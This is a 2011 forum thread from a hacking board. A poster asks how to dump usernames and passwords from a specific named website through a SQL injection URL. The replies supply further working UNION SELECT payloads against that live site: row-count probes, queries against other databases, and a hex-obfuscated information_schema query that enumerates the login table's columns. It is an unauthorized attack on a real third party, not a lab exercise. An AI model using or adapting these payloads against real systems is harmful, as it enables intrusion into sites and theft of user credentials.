Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
password and user in this site >>> Exploitation does not appear
Posted by: blackrose
Date: June 17, 2011 06:51AM

password and user in this site
Exploitation does not appear


http://www.trollhaugen.com/calendar.php?id=-79%20UNION%20SELECT%201,2,3,4,group_concat%28login,0x3a,password%29,6,7+from+test_sql.tblogin

What is the solution

Options: ReplyQuote
Re: password and user in this site >>> Exploitation does not appear
Posted by: 9hh2yj
Date: June 17, 2011 08:52PM

Well, there are no rows to display as shown by this:

http://www.trollhaugen.com/calendar.php?id=1%20UNION%20SELECT%201,2,3,4,5,count%28login%29,7%20FROM%20test_sql.tblogin

It seems like a privilege issue because you can fetch the rows from any of the tables in trollhaugen_08, like this:

http://www.trollhaugen.com/calendar.php?id=1%20UNION%20SELECT%201,2,3,4,5,count%28eventtitle%29,7%20FROM%20trollhaugen_08.tbl_calendar

That's about as far as I can help

Options: ReplyQuote
Re: password and user in this site >>> Exploitation does not appear
Posted by: sh3llm4n
Date: June 18, 2011 04:54AM

Hi.. you can try this...

id=-79 UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,(select concat(0x7e,0x27,unhex(Hex(cast(group_concat(column_name) as char))),0x27,0x7e) FROM information_schema.columns Where table_schema=0x746573745F73716C AND table_name=0x74626C6F67696E),0x31303235343830303536,0x31303235343830303536,0x31303235343830303536--


but it hasn't any value in this table...

Options: ReplyQuote


Go to: Forum ListMessage ListSearchLog In
Sorry, only registered users may post in this forum.
Click here to login

Falling Rock Networks

sla.ckers.org RSS feed
Board haX0r3d together by ha.ckers.org, forshizzle. *